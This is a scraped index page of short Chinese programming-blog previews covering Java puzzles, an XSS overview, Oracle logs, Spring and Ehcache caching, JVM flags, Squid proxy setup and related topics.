个人感觉如果英语基础能力不错的话,可以浏览国外的网站来进行软件技术基础的学习,例如java开发中常用的到的网站有apache.org 里面有apache的很多Projects,springframework.org是spring相关的项目网站,还有几个感觉不错的
    
                                
    • 
                                
  • 编程之美-光影切割问题
                                    bylijinnan
编程之美
                                    
    
package a;

public class DisorderCount {

	/**《编程之美》“光影切割问题”
	 * 主要是两个问题:
	 * 1.数学公式(设定没有三条以上的直线交于同一点):
	 * 两条直线最多一个交点,将平面分成了4个区域;
	 * 三条直线最多三个交点,将平面分成了7个区域;
	 * 可以推出:N条直线 M个交点,区域数为N+M+1。

    
                                
    • 
                                
  • 关于Web跨站执行脚本概念
                                    chenbowen00
Web安全跨站执行脚本
                                    
    跨站脚本攻击(XSS)是web应用程序中最危险和最常见的安全漏洞之一。安全研究人员发现这个漏洞在最受欢迎的网站,包括谷歌、Facebook、亚马逊、PayPal,和许多其他网站。如果你看看bug赏金计划,大多数报告的问题属于 XSS。为了防止跨站脚本攻击,浏览器也有自己的过滤器,但安全研究人员总是想方设法绕过这些过滤器。这个漏洞是通常用于执行cookie窃取、恶意软件传播,会话劫持,恶意重定向。在
    
                                
    • 
                                
  • [开源项目与投资]投资开源项目之前需要统计该项目已有的用户数
                                    comsci
开源项目
                                    
     
 
 
        现在国内和国外,特别是美国那边,突然出现很多开源项目,但是这些项目的用户有多少,有多少忠诚的粉丝,对于投资者来讲,完全是一个未知数,那么要投资开源项目,我们投资者必须准确无误的知道该项目的全部情况,包括项目发起人的情况,项目的维持时间..项目的技术水平,项目的参与者的势力,项目投入产出的效益.....
    
                                
    • 
                                
  • oracle alert log file(告警日志文件)
                                    daizj
oracle告警日志文件alert log file
                                    
    The alert log is a chronological log of messages and errors, and includes the following items: 
 
All internal errors (ORA-00600), block corruption errors (ORA-01578), and deadlock errors (ORA-00060) 
    
                                
    • 
                                
  • 关于 CAS SSO 文章声明
                                    denger
SSO
                                    
    由于几年前写了几篇 CAS 系列的文章,之后陆续有人参照文章去实现,可都遇到了各种问题,同时经常或多或少的收到不少人的求助。现在这时特此说明几点: 
 
1.  那些文章发表于好几年前了,CAS 已经更新几个很多版本了,由于近年已经没有做该领域方面的事情,所有文章也没有持续更新。 
 
2. 文章只是提供思路,尽管 CAS 版本已经发生变化,但原理和流程仍然一致。最重要的是明白原理,然后
    
                                
    • 
                                
  • 初二上学期难记单词
                                    dcj3sjt126com
englishword
                                    
    lesson 课 
traffic 交通 
matter 要紧;事物 
happy 快乐的,幸福的 
second 第二的 
idea 主意;想法;意见 
mean 意味着 
important 重要的,重大的 
never 从来,决不 
afraid 害怕 的 
fifth 第五的 
hometown 故乡,家乡 
discuss 讨论;议论 
east 东方的 
agree 同意;赞成 
bo
    
                                
    • 
                                
  • uicollectionview 纯代码布局, 添加头部视图
                                    dcj3sjt126com
Collection
                                    
    #import <UIKit/UIKit.h>

@interface myHeadView : UICollectionReusableView
{
    UILabel   *TitleLable;
}
-(void)setTextTitle;
@end
 
#import "myHeadView.h"

@implementation m
    
                                
    • 
                                
  • N 位随机数字串的 JAVA 生成实现
                                    FX夜归人
javaMath随机数Random
                                    
    /**
 * 功能描述 随机数工具类<br />
 * @author FengXueYeGuiRen
 * 创建时间 2014-7-25<br />
 */
public class RandomUtil {
    //  随机数生成器
    private static java.util.Random random = new java.util.R
    
                                
    • 
                                
  • Ehcache(09)——缓存Web页面
                                    234390216
ehcache页面缓存
                                    
    页面缓存 
目录 
1       SimplePageCachingFilter 
1.1      calculateKey 
1.2      可配置的初始化参数 
1.2.1     cach
    
                                
    • 
                                
  • spring中少用的注解@primary解析
                                    jackyrong
primary
                                    
    这次看下spring中少见的注解@primary注解,例子 
 
 

@Component
public class MetalSinger implements Singer{

    @Override
    public String sing(String lyrics) {
        return "I am singing with DIO voice
    
                                
    • 
                                
  • Java几款性能分析工具的对比
                                    lbwahoo
java
                                    
    Java几款性能分析工具的对比 
摘自:http://my.oschina.net/liux/blog/51800 
  
在给客户的应用程序维护的过程中,我注意到在高负载下的一些性能问题。理论上,增加对应用程序的负载会使性能等比率的下降。然而,我认为性能下降的比率远远高于负载的增加。我也发现,性能可以通过改变应用程序的逻辑来提升,甚至达到极限。为了更详细的了解这一点,我们需要做一些性能
    
                                
    • 
                                
  • JVM参数配置大全
                                    nickys
jvm应用服务器
                                    
    JVM参数配置大全 
 
/usr/local/jdk/bin/java -Dresin.home=/usr/local/resin -server -Xms1800M -Xmx1800M -Xmn300M -Xss512K -XX:PermSize=300M -XX:MaxPermSize=300M -XX:SurvivorRatio=8 -XX:MaxTenuringThreshold=5 -
    
                                
    • 
                                
  • 搭建 CentOS 6 服务器(14) - squid、Varnish
                                    rensanning
varnish
                                    
    (一)squid 
 
安装 
 
# yum install httpd-tools -y
# htpasswd -c -b /etc/squid/passwords squiduser 123456
# yum install squid -y 
 
设置 
 
# cp /etc/squid/squid.conf /etc/squid/squid.conf.bak
# vi /etc/
    
                                
    • 
                                
  • Spring缓存注解@Cache使用
                                    tom_seed
spring
                                    
    参考资料 
http://www.ibm.com/developerworks/cn/opensource/os-cn-spring-cache/ 
http://swiftlet.net/archives/774 
  
缓存注解有以下三个: 
@Cacheable      @CacheEvict     @CachePut
    
                                
    • 
                                
  • dom4j解析XML时出现"java.lang.noclassdeffounderror: org/jaxen/jaxenexception"错误
                                    xp9802

                                    
    java.lang.NoClassDefFoundError: org/jaxen/JaxenExc 
关键字: java.lang.noclassdeffounderror: org/jaxen/jaxenexception 
使用dom4j解析XML时,要快速获取某个节点的数据,使用XPath是个不错的方法,dom4j的快速手册里也建议使用这种方式 
执行时却抛出以下异常: 
Exceptio
    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他